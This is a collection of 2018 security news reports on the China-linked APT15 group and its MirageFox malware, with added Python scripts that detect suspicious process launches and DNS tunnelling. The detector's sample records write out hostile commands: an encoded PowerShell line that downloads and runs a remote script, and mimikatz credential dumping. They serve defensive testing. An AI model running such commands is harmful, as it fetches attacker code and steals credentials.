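        elif any(k in low for k in SUSPICIOUS_PS):
            yield "powershell_suspicious_args"


def scan(events):
    """Return (rule, image) pairs for every match across the supplied records."""
    return [(rule, e.get("Image")) for e in events for rule in classify(e)]


# Constructed records in a Sysmon Event ID 1-like shape; none of this is from the Symantec report.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\PSEXESVC.exe", "CommandLine": r"C:\Windows\PSEXESVC.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"Image": r"C:\Users\ops\AppData\Local\Temp\mk.exe",
     "CommandLine": 'mk.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(rule, image)
```

The last two sample records are the benign controls: a service host and an administrator's signed-script invocation produce no hit, because the rules look for the encoded-command flag and specific download or hidden-window arguments rather than for PowerShell itself.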

Further details, including IoCs are reported in the analysis published by Symantec.

China-Linked APT15 is still very active, experts found its new malware tracked as ‘MirageFox’
18.6.2018 securityaffairs APT

Following the recent hack of a US Navy contractor, security experts found evidence of very recent activity by the China-linked APT group tracked as APT15.
The China-linked APT15 group (aka Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) has developed a new strain of malware that borrows code from one of the tools it used in past operations.

APT15 has been active since at least 2010, conducting cyber espionage campaigns against targets in the defense, high-tech, energy, government, aerospace and manufacturing industries worldwide. The attackers have demonstrated an increasing level of sophistication over the years, using custom malware and various exploits in their attacks.

Over the years, security firms have identified many hacking tools associated with APT15, such as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb.

The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.

In March 2018, APT15 used new backdoors in an attack that was likely part of a wider operation aimed at contractors of various UK government departments and military organizations.

One of the attacks targeted a UK-based customer of NCC Group, an organization that provides a wide range of services to the United Kingdom government; by targeting the customer, the hackers went after government departments and military technology.

NCC noted at the time that APT15 used two new backdoors, tracked as RoyalCLI and RoyalDNS.

One of the backdoors was named RoyalCLI after a debugging path left in the binary; it is the successor of the BS2005 backdoor used by the group. Both RoyalCLI and BS2005 communicate with their command and control (C&C) servers through Internet Explorer, using the COM interface IWebBrowser2, so the beacon traffic is generated by a legitimate browser process.

The attackers used Windows commands for reconnaissance; lateral movement was conducted with a combination of the net command, mounting the C$ share of hosts, and manually copying files to or from compromised hosts.

The second backdoor, tracked as RoyalDNS, uses DNS to communicate with the C&C server; once a command has been executed, the backdoor returns its output through DNS.
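How a defender would spot RoyalDNS-style traffic, as an added example that is not part of the NCC Group or securityaffairs material and does not reproduce RoyalDNS's own encoding (which the page does not describe): the script groups resolver log lines by zone and computes the features that separate a DNS command channel from ordinary lookups, namely many never-repeating, long, high-entropy subdomains (command output chunked into labels) and a high share of TXT/NULL queries (records large enough to carry data back). The log lines, client addresses and the example.com/example.net zones are constructed for the example; the thresholds are starting points to baseline against real traffic, and treating the last two labels as the zone is a simplification that a public-suffix list would replace.

```python
import collections
import hashlib
import math


def shannon_entropy(text):
    """Bits of entropy per character. Hex/base32 chunks score around 3.5-4.5, words 2-3."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in collections.Counter(text).values())


def split_query(qname, zone_labels=2):
    """Split 'a.b.example.net.' into ('example.net', 'a.b'). Using the last two labels as the
    zone is a simplification; a public-suffix list handles cases such as co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-zone_labels:]), ".".join(labels[:-zone_labels])


def parse_log(lines):
    """Parse constructed resolver log lines of the form '<ts> <client> <qname> <qtype>'."""
    records = []
    for line in lines:
        parts = line.split()
        if len(parts) == 4:
            records.append((parts[0], parts[1], parts[2], parts[3].upper()))
    return records


def score_zones(records, min_queries=5, min_len=24, min_entropy=3.5, min_txt_ratio=0.5):
    """Per-zone features: a tunnel encodes data into many long, high-entropy, never-repeating
    subdomains and tends to ask for TXT/NULL records so the server can push bytes back."""
    by_zone = collections.defaultdict(list)
    for _, client, qname, qtype in records:
        zone, sub = split_query(qname)
        by_zone[zone].append((client, sub, qtype))
    report = {}
    for zone, rows in by_zone.items():
        subs = [sub for _, sub, _ in rows]
        n = len(rows)
        feats = {
            "queries": n,
            "unique_ratio": len(set(subs)) / n,
            "avg_sub_len": sum(len(s) for s in subs) / n,
            "avg_entropy": sum(shannon_entropy(s.replace(".", "")) for s in subs) / n,
            "txt_ratio": sum(1 for _, _, t in rows if t in ("TXT", "NULL")) / n,
        }
        feats["tunnel_suspect"] = bool(
            n >= min_queries
            and feats["unique_ratio"] > 0.8
            and feats["avg_sub_len"] >= min_len
            and feats["avg_entropy"] >= min_entropy
            and feats["txt_ratio"] >= min_txt_ratio
        )
        report[zone] = feats
    return report


def constructed_log():
    """Constructed sample: ordinary lookups for example.com, then a tunnel-shaped burst where
    each query carries a 64-hex-character chunk split across two labels (max label is 63)."""
    lines = []
    for i, sub in enumerate(["www", "mail", "login", "www", "api"]):
        lines.append("2018-06-08T09:0%d:00Z 10.20.30.40 %s.example.com A" % (i, sub))
    for i in range(6):
        chunk = hashlib.sha256(b"chunk%d" % i).hexdigest()
        lines.append("2018-06-08T09:1%d:00Z 10.20.30.41 %04x.%s.%s.example.net TXT"
                     % (i, i, chunk[:32], chunk[32:]))
    return lines


if __name__ == "__main__":
    for zone, feats in score_zones(parse_log(constructed_log())).items():
        print(zone, feats)
```

A backdoor that only polls for commands with short, repeated names will not trip the length and uniqueness features; what the script catches is the exfiltration of command output, which is the direction the article describes, and the same per-zone statistics are cheap enough to run continuously over resolver logs.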

Researchers from security firm Intezer have recently identified a new piece of malware linked to APT15. The discovery was accidental: the experts found the malware while hunting with YARA rules written for Mirage, one of the oldest tools used by APT15, and for the Reaver malware, which has been linked to cyber espionage campaigns conducted by China-linked APT groups.

“Coincidentally, following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare, we have found evidence of very recent activity by a group referred to as APT15, known for committing cyber espionage which is believed to be affiliated with the Chinese government.” reads the analysis published by Intezer.

“The malware involved in this recent campaign, MirageFox, looks to be an upgraded version of a tool, a RAT believed to originate in 2012, known as Mirage.”

The researchers named the new malware MirageFox, after a string found in one of its components; it borrows code from both Mirage and Reaver.

MirageFox shares with the original Mirage malware the code for a remote shell and the function for decrypting command and control (C&C) configuration data.

Mirage also shares code with other malware attributed to APT15, including BMW, BS2005, and particularly MyWeb. Code similarities suggest that the Reaver malware was also developed by APT15.

APT15 malware comparison

“MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth.” continues the analysis published by Intezer.

“Then it sends this information to the C&C, opens a backdoor, and sits waiting for commands from the C&C with functionality such as modifying files, launching processes, terminating itself, and more functionality typically seen in APT15’s RATs,”

The sample analyzed by the experts was compiled on June 8 and it was uploaded to VirusTotal on June 9.

The malware leverages a legitimate McAfee binary to load its malicious code through DLL hijacking, a technique the group has already used in past attacks.

Intezer experts also noticed that the C&C server is configured with an internal IP address, which confirms the sample was built for a specific target organization.

“If you look at it the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address. If you read the report mentioned above about RoyalAPT by NCC Group, it is mentioned that APT15 infiltrated an organization again after stealing a VPN private key, therefore we can assume this version was tailor made to an organization they have already infiltrated and are connecting to the internal network using a VPN.” continues the report.

At this time the attack vector is still unclear; further technical details, including IoCs, are reported in the analysis published by the company.

“There is high confidence that MirageFox can be attributed to APT15 due to code and other similarities in the MirageFox binaries.” concludes Intezer.

“As is known about APT15, after infiltrating their target, they conduct a lot of reconnaissance work, send the commands from the C&C manually, and will customize their malware components to best suit the environment they have infected.”

China-Linked APT15 Develops New 'MirageFox' Malware
18.6.2018 securityweek APT 

A cyber-espionage group believed to be operating out of China has developed a new piece of malware that appears to be based on one of the first tools used by the threat actor.

The actor is known as APT15, Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon, and its tools are tracked by various cybersecurity companies as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb. The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.

One of APT15’s more recent attacks was uncovered last year when the hackers targeted a UK-based customer of NCC Group. The organization provides a wide range of services to the United Kingdom government and NCC believes the attackers may have targeted government departments and military technology through its customer.

NCC noted at the time that the group had improved its tools and techniques. The company had uncovered two new backdoors used by APT15, including RoyalCLI, a successor of BS2005, and RoyalDNS.

Intezer, a cybersecurity firm that specializes in recognizing code reuse, reported last week that it had identified a new piece of malware linked to APT15 based on YARA rules created for Mirage, the oldest tool used by the threat actor, and Reaver, another piece of malware previously linked by researchers to China.

The new malware, dubbed by Intezer MirageFox based on a string found in one of the components, shares code with both Mirage and Reaver. Experts have found significant similarities to the original Mirage malware, including in the code used for a remote shell and the function for decrypting command and control (C&C) configuration data.

Code similarities between Mirage and MirageFox

“MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth. Then it sends this information to the C&C, opens a backdoor, and sits waiting for commands from the C&C with functionality such as modifying files, launching processes, terminating itself, and more functionality typically seen in APT15’s RATs,” Jay Rosenberg, senior security researcher at Intezer, explained in a blog post.

The sample analyzed by the security firm was compiled on June 8 and uploaded to VirusTotal one day later. While it’s unclear how the malware has been distributed to victims, Intezer has made some interesting observations about MirageFox.

The malware appears to abuse a legitimate McAfee binary to load malicious processes through DLL hijacking. APT15 has been known to use DLL hijacking in its campaigns.

Intezer also noticed that a C&C server has an internal IP address, which suggests that the sample was specifically configured for the targeted organization and that, similar to the attack described earlier this year by NCC Group, the attackers gained access to the victim’s internal network using a VPN.

It’s unclear if they are connected, but Intezer pointed out that the discovery of MirageFox coincides with reports of an attack in which hackers believed to be sponsored by China stole sensitive information from a US Navy contractor.

While previous public reports on APT15 claim the group has been around since at least 2010, Rosenberg told SecurityWeek over the weekend that he has identified a Mirage sample uploaded to VirusTotal in 2009.

Rosenberg also noted that Mirage shares code with other pieces of malware attributed to APT15, including BMW, BS2005, and particularly MyWeb. The expert also believes, based on the code they share, that the developers of APT15 malware may have also created Reaver.